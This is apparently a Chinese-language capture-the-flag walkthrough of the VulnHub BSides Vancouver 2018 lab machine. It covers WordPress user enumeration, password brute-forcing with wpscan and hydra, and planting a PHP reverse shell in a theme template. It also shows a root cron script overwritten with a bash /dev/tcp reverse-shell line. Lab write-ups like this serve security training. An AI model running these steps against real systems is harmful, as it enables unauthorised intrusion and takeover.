0x00 准备
靶机下载:
https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/#release
双击ovf文件,导入到Vmware中,选择NAT模式
Kali:192.168.194.140
0x01 测试
首先nmap扫描同一C段:nmap 192.168.194.1/24,找到目标机器IP:192.168.194.143,且开放21、22、80端口。
访问Web页面(80端口)
使用dirsearch.py脚本进行目录扫描:
python dirsearch.py -u “http://192.168.194.143/” -e *
访问robots.txt,得到一个弃用的Wordpress的路径地址,访问首页看到了作者:john,得到一个用户名。
接着使用dirsearch.py进行扫描:
python dirsearch.py -u “192.168.194.143/backup_wordpress/” -e *
访问/readme,可以看到该站的版本为4.5一个很老的版本,现在最新已经出5.4了,这种老站已经相对很少了,但是对付老站就可以掏出神器wpscan进行漏扫。
root@kali:~# wpscan –url http://192.168.194.143/backup_wordpress/ –enumerate u
枚举出两个可用用户admin、john
访问:http://192.168.194.143/backup_wordpress/wp-login.php进行抓包爆破后台密码,载入一个常用密码字典即可。网上搜罗,最终得到john的密码是enigma
进入后台后选择“外观”->“编辑”->404 模板.php, 修改404.php文件写一个反弹Shell的PHP木马,可用Kali中自带的,路径: /usr/share/webshells/php/php-reverse-shell.php 将IP写为Kali的IP,端口为Kali端用nc监听端口。
在下方点击“Update File”更新即可,然后访问指定路径:http://192.168.194.143/backup_wordpress/wp-content/themes/twentysixteen/404.php
该路径可以看出是右边两个红圈的名字,当处于加载转动状态,回到Kali监听端即可看到反弹回Shell
接着利用python做一个交互式的TTL的终端,命令:python -c 'import pty; pty.spawn("/bin/bash")'
,查看当前权限是www-data,然后查看下可以登录该机器的用户有哪些。
其中存在几个拥有bash权限的用户,利用hydra尝试爆破下SSH密码,最终只得到anni的密码为princess
SSH连接登录:ssh anne@192.168.194.143 随后提权到root用户,拿到flag
第二种方法:查看定时任务,存在一个以root用户定时执行的任务
查看原有的cleanup是以一个清除Apach日志记录的,将其重新写入,注意这样拿到的Shell没有rm和vi命令,只能通过echo进行写入
echo ‘#!/bin/bash’ > cleanup
echo ‘bash -i >& /dev/tcp/192.168.194.140/4444 0>&1’ >> cleanup
然后快捷键【Ctrl】+【Shift】+【T】新开一个终端,监听4444端口,一会就收到root用户的Shell了。